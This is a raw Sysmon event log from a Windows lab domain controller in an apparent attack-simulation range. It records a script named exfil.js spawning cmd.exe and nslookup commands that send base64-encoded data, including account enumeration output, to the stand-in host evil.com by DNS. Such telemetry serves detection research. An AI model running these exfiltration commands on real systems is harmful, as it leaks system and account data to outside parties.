14:16:44.394{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000203972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.394{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqxno.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.360{2E1864BB-17CC-629A-E041-000000005F02}7247808C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-E141-000000005F02}2240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.359{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.359{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.358{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.358{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E141-000000005F02}2240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.357{2E1864BB-17CC-629A-DF41-000000005F02}76327964C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-E141-000000005F02}2240C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.357{2E1864BB-17CC-629A-E141-000000005F02}2240C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-DF41-000000005F02}7632C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqxno.tmp 2>&1 10341000x8000000000000000203963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.293{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E041-000000005F02}724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.293{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E041-000000005F02}724C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.293{2E1864BB-17CC-629A-E041-000000005F02}7247808C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-DF41-000000005F02}7632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.262{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E041-000000005F02}724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.262{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.262{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-DF41-000000005F02}7632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.262{2E1864BB-17A1-629A-783D-000000005F02}55524596C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-DF41-000000005F02}7632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.263{2E1864BB-17CC-629A-DF41-000000005F02}7632C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqxno.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.257{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkpjqb.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.209{2E1864BB-17CC-629A-DD41-000000005F02}81284796C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-DE41-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000203950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.209{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C289BCE0E133D5627A856A1A4725FB38,SHA256=15CA506E19A7E553D074FC80763A4ABDFF17829F2992769F3B32165B0518E20D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.194{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-DE41-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.194{2E1864BB-17CC-629A-DC41-000000005F02}50647052C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-DE41-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.205{2E1864BB-17CC-629A-DE41-000000005F02}6652C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-DC41-000000005F02}5064C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkpjqb.tmp 2>&1 10341000x8000000000000000203942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.178{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-DD41-000000005F02}8128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 